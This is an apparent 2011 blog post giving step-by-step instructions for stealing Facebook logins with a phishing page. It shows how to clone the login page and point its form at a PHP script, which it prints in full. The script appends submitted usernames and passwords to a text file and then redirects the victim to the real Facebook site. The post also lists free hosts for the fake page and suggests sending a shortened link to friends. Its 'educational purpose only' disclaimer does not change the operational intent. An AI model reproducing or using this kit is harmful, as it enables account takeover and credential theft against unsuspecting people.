Cpanel Hosting

Monday 10 October 2011

How to Hack Facebook Account Using Phishing webPage

Phishing WebPage:
     Creating web page which look like any site is described as Phishing.  By creating Phishing Web Page, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.



Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:
 The big red ring that circles the action= you have to change. You have to change it to 'action="a.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html
Step 3:
Now we need to create the "a.php" to store the password.  so open the notepad and type the following code:


<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "a.php"
Step 4:
open the notepad and just save the file as "passwd.txt" without any contents.

Now upload those three files(namely index.html,a.php,passwd.txt) in any of Free  Web hosting site.
For: Example:
*http://110mb.com/
*http://ripway.com/
*http://superfreehost.info/
*http://freehostia.com/
*http://funpic.de/
*http://freeweb7.com/
*http://t35.com/
*http://awardspace.com/
*http://phpnet.us/
*http://freewebhostingpro.com/
*http://prohosts.org/
*http://prohosts.org/
*http://byethost.com/
*http://000webhost.com/
*http://www.my5gb.com/
*http://www.oxyhost.com/
*http://www.rack111.com/
*http://0costwebhost.com/
*http://www.freezoka.com/




Step 5: After the Account is created (Eg: fakebook.t35.com) .Just go to Google Url  Shortener and paste your link (fakebook.t35.com) and shorten the Url and which will look like http://goo.gl/cuSwY .Just give this link to your friends and after they have tried to login into your link .Just check the password in passwd.txt file.
http://fakebook.t35.com/passwd.txt .


Note: Don't use this method for hacking others account. This article is for educational purpose only.